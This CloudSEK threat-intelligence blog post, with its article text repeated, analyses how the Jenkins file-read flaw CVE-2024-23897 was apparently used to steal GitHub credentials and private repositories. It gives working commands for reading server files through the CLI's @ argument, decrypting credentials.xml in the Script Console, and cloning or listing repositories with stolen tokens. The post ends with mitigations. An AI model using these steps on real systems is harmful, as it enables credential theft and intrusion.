Adversary Intelligence
6
mins read

Exposing the Exploitation: How CVE-2024-23897 Led to the Compromise of Github Repos via Jenkins LFI Vulnerability

This blog details how CVE-2024-23897, a Local File Inclusion (LFI) vulnerability in Jenkins, was exploited to breach Github repositories. Attackers accessed sensitive files, decrypted credentials, and used them to infiltrate private repositories. The article underscores the need for timely patching, strong authentication, and regular security audits to mitigate such threats.

CloudSEK TRIAD
July 29, 2024
Green Alert
Last Update posted on
July 29, 2024
Stay Ahead of External Threats with comprehensive Attack Surface Monitoring

Did you know that 70% of successful breaches are perpetrated by external actors exploiting vulnerabilities in an organization's attack surface? With CloudSEK BeVigil Enterprise, you can proactively detect and mitigate potential threats, ensuring a robust defense against cyber attacks.

Schedule a Demo
Table of Contents
Author(s)
No items found.

Category: Adversary Intelligence
Region: Global
Date: 24 July 2024
TLP: GREEN

Executive Summary

This article delves into the technical intricacies of CVE-2024-23897, an unauthenticated Local File Inclusion (LFI) vulnerability in Jenkins, and retraces how threat actors leveraged it to breach a company's Github repositories.

Potential Flow of the Exploitation

Setting the Stage: A Vulnerable Jenkins Instance

Our story begins with a seemingly innocuous Jenkins server, a cornerstone of continuous integration and deployment pipelines. Unfortunately, this particular instance, running a vulnerable version (Jenkins 2.441 and earlier, LTS 2.426.2 and earlier), became the target of threat actors' malicious intentions recently.

To understand the attack, let's first set up a similar vulnerable environment using Docker:

Docker Setup Steps:

1. Pull Docker image using the command:

docker pull jenkins/jenkins:2.440-jdk17

2. Run the container:

docker run -d --name jenkins -p 8080:8080 -p 50000:50000 -v /path/to/your/local/jenkins/home:/var/jenkins_home jenkins/jenkins:2.440-jdk17

This command launches a Jenkins container, mapping ports 8080 and 50000 to the host machine and mounting a local directory to the container's /var/jenkins_home directory.

3. Access the container's shell:

docker exec -it <container_name> /bin/bash

With the stage set, let's explore how threat actors are exploiting the vulnerability.

Unmasking the Vulnerability - CVE-2024-23897

CVE-2024-23897 is an unauthenticated LFI vulnerability that allows attackers to read arbitrary files on the Jenkins server. This vulnerability arises from improper input validation, enabling attackers to manipulate specific parameters and trick the server into accessing and displaying the contents of sensitive files.

The Heist - Exfiltrating Github Secrets

  1. Reconnaissance: Threat actors likely began by identifying the vulnerable Jenkins instance and confirming the presence of Git integration
  2. Exploiting the LFI: Using the vulnerability, IntelBroker gained access to sensitive files on the Jenkins server, including the credentials.xml file, which stores encrypted credentials used for various integrations
  3. Decrypting the Loot: IntelBroker then used the Jenkins Script Console to decrypt the contents of the credentials.xml file, gaining access to Github SSH keys and access tokens
  4. Plundering the Repositories: With the stolen credentials, IntelBroker could authenticate to Github and access the company's private repositories, stealing valuable source code, proprietary information, and other sensitive data

Technical Analysis

Let's delve into the technical details of how IntelBroker exploited the LFI and exfiltrated the Github credentials:

1. Reading Sensitive Files:

IntelBroker potentially used the Jenkins CLI tool along with the LFI vulnerability to read the contents of sensitive files. For instance, to read the /etc/passwd file:

java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ -auth @password.txt version @/etc/passwd

Screenshot showing contents of “/etc/passwd” and “/etc/hosts”

By manipulating the @ symbol, they could trick the server into interpreting the path after it as a file to include.

Note: POC scripts for the CVE-2024-23897 are also available on github.

IntelBroker potentially dumped the credentials.xml using the below POC or a script from github, to get the stored encrypted credentials. System Path for the file being /var/jenkins_home/credentials.xml

Screenshot showing credentials.xml

2. Analyzing credentials.xml File:

Jenkins stores all the Global Credentials in encrypted form in this file. The stored hash can be decrypted using hudson.util.Secret.decrypt().

Screenshot showing unique id and encrypted keys stored in credentials,xml folre

3. Decrypting Credentials:

Once they had access to the credentials.xml file, threat actors use the Jenkins Script Console and the following command to decrypt the encrypted credentials:

println(hudson.util.Secret.fromString("{XXX=}").getPlainText())

Replacing {XXX=} with the encrypted string from the credentials.xml file allowed them to retrieve the plaintext Github credentials.

Screenshot showing decrypted SSH Private Key

4. Compromising Github Repositories:

With the stolen SSH keys and access tokens, threat actors could:

Clone private repositories:

Using the git clone command with the stolen SSH key added to their SSH agent or by directly embedding the access token in the URL:

git clone [email protected]:target-username/private-repo.git

Note: 

  • With the SSH private key the threat actor can clone the repositories known to him and not list them 
  • With Github Access token the Threat Actor can clone as well as list the repositories

Access repositories via Github API:

Using the stolen access token in the Authorization header, they could interact with the Github API to list and download repositories:

curl -H "Authorization: token github_access_token" https://api.github.com/user/repos

Lessons Learned and Mitigations

IntelBroker's successful breach serves as a stark reminder of the importance of cybersecurity awareness and proactive security measures. Here are some key takeaways and mitigation strategies:

  • Timely Patching: Keep your Jenkins server up-to-date with the latest security patches to mitigate known vulnerabilities.
  • Strong Authentication: Enforce strong passwords and implement multi-factor authentication (MFA) for all user accounts, especially those with administrative privileges.
  • Principle of Least Privilege: Grant users only the necessary permissions required to perform their tasks. Avoid using shared accounts.
  • Regular Security Audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities proactively.
  • Threat Intelligence: Utilize threat intelligence to understand a threat actor’s motives, targets, and attack behaviors.
  • Shadow IT: Monitor and manage the use of IT-related hardware or software by departments or individuals without the knowledge of the IT or security group within the organization.

By understanding the intricacies of CVE-2024-23897 and implementing robust security practices, organizations can better protect themselves against such sophisticated attacks.

Author

CloudSEK TRIAD

CloudSEK Threat Research and Information Analytics Division

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
Blog Image
Vulnerability Intelligence
April 10, 2024

Case Study: Uncovering a Critical Vulnerability in a Life Insurance App That Compromised User Privacy Through Exposed Sensitive Data and Live Activity

This detailed report which delves into a case study on a security incident unveiled with CloudSEK’s Digital Supply Chain Security platform SVigil on an Life Insurance Mobile Application for a prominent bank. 

Blog Image
Vulnerability Intelligence
June 16, 2023

CVE-2023-20887 Leads to RCE in VMware Aria Operations for Networks

CVE 2023-20887 was discovered in the VMware Aria Operations with a CVSS score of 9.8 which leads to VMware Aria.

Blog Image
Vulnerability Intelligence
April 28, 2023

Users of Popular Android Applications Risk Getting Compromised Via Highly Privileged Device Migration Tools

CloudSEK’s researchers identified that multiple applications do not invalidate or revalidate session cookies if app data is transferred from one device to another.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Adversary Intelligence

6

min read

Exposing the Exploitation: How CVE-2024-23897 Led to the Compromise of Github Repos via Jenkins LFI Vulnerability

This blog details how CVE-2024-23897, a Local File Inclusion (LFI) vulnerability in Jenkins, was exploited to breach Github repositories. Attackers accessed sensitive files, decrypted credentials, and used them to infiltrate private repositories. The article underscores the need for timely patching, strong authentication, and regular security audits to mitigate such threats.

Authors
CloudSEK TRIAD
CloudSEK Threat Research and Information Analytics Division
Co-Authors
No items found.

Category: Adversary Intelligence
Region: Global
Date: 24 July 2024
TLP: GREEN

Executive Summary

This article delves into the technical intricacies of CVE-2024-23897, an unauthenticated Local File Inclusion (LFI) vulnerability in Jenkins, and retraces how threat actors leveraged it to breach a company's Github repositories.

Potential Flow of the Exploitation

Setting the Stage: A Vulnerable Jenkins Instance

Our story begins with a seemingly innocuous Jenkins server, a cornerstone of continuous integration and deployment pipelines. Unfortunately, this particular instance, running a vulnerable version (Jenkins 2.441 and earlier, LTS 2.426.2 and earlier), became the target of threat actors' malicious intentions recently.

To understand the attack, let's first set up a similar vulnerable environment using Docker:

Docker Setup Steps:

1. Pull Docker image using the command:

docker pull jenkins/jenkins:2.440-jdk17

2. Run the container:

docker run -d --name jenkins -p 8080:8080 -p 50000:50000 -v /path/to/your/local/jenkins/home:/var/jenkins_home jenkins/jenkins:2.440-jdk17

This command launches a Jenkins container, mapping ports 8080 and 50000 to the host machine and mounting a local directory to the container's /var/jenkins_home directory.

3. Access the container's shell:

docker exec -it <container_name> /bin/bash

With the stage set, let's explore how threat actors are exploiting the vulnerability.

Unmasking the Vulnerability - CVE-2024-23897

CVE-2024-23897 is an unauthenticated LFI vulnerability that allows attackers to read arbitrary files on the Jenkins server. This vulnerability arises from improper input validation, enabling attackers to manipulate specific parameters and trick the server into accessing and displaying the contents of sensitive files.

The Heist - Exfiltrating Github Secrets

  1. Reconnaissance: Threat actors likely began by identifying the vulnerable Jenkins instance and confirming the presence of Git integration
  2. Exploiting the LFI: Using the vulnerability, IntelBroker gained access to sensitive files on the Jenkins server, including the credentials.xml file, which stores encrypted credentials used for various integrations
  3. Decrypting the Loot: IntelBroker then used the Jenkins Script Console to decrypt the contents of the credentials.xml file, gaining access to Github SSH keys and access tokens
  4. Plundering the Repositories: With the stolen credentials, IntelBroker could authenticate to Github and access the company's private repositories, stealing valuable source code, proprietary information, and other sensitive data

Technical Analysis

Let's delve into the technical details of how IntelBroker exploited the LFI and exfiltrated the Github credentials:

1. Reading Sensitive Files:

IntelBroker potentially used the Jenkins CLI tool along with the LFI vulnerability to read the contents of sensitive files. For instance, to read the /etc/passwd file:

java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ -auth @password.txt version @/etc/passwd

Screenshot showing contents of “/etc/passwd” and “/etc/hosts”

By manipulating the @ symbol, they could trick the server into interpreting the path after it as a file to include.

Note: POC scripts for the CVE-2024-23897 are also available on github.

IntelBroker potentially dumped the credentials.xml using the below POC or a script from github, to get the stored encrypted credentials. System Path for the file being /var/jenkins_home/credentials.xml

Screenshot showing credentials.xml

2. Analyzing credentials.xml File:

Jenkins stores all the Global Credentials in encrypted form in this file. The stored hash can be decrypted using hudson.util.Secret.decrypt().

Screenshot showing unique id and encrypted keys stored in credentials,xml folre

3. Decrypting Credentials:

Once they had access to the credentials.xml file, threat actors use the Jenkins Script Console and the following command to decrypt the encrypted credentials:

println(hudson.util.Secret.fromString("{XXX=}").getPlainText())

Replacing {XXX=} with the encrypted string from the credentials.xml file allowed them to retrieve the plaintext Github credentials.

Screenshot showing decrypted SSH Private Key

4. Compromising Github Repositories:

With the stolen SSH keys and access tokens, threat actors could:

Clone private repositories:

Using the git clone command with the stolen SSH key added to their SSH agent or by directly embedding the access token in the URL:

git clone [email protected]:target-username/private-repo.git

Note: 

  • With the SSH private key the threat actor can clone the repositories known to him and not list them 
  • With Github Access token the Threat Actor can clone as well as list the repositories

Access repositories via Github API:

Using the stolen access token in the Authorization header, they could interact with the Github API to list and download repositories:

curl -H "Authorization: token github_access_token" https://api.github.com/user/repos

Lessons Learned and Mitigations

IntelBroker's successful breach serves as a stark reminder of the importance of cybersecurity awareness and proactive security measures. Here are some key takeaways and mitigation strategies:

  • Timely Patching: Keep your Jenkins server up-to-date with the latest security patches to mitigate known vulnerabilities.
  • Strong Authentication: Enforce strong passwords and implement multi-factor authentication (MFA) for all user accounts, especially those with administrative privileges.
  • Principle of Least Privilege: Grant users only the necessary permissions required to perform their tasks. Avoid using shared accounts.
  • Regular Security Audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities proactively.
  • Threat Intelligence: Utilize threat intelligence to understand a threat actor’s motives, targets, and attack behaviors.
  • Shadow IT: Monitor and manage the use of IT-related hardware or software by departments or individuals without the knowledge of the IT or security group within the organization.

By understanding the intricacies of CVE-2024-23897 and implementing robust security practices, organizations can better protect themselves against such sophisticated attacks.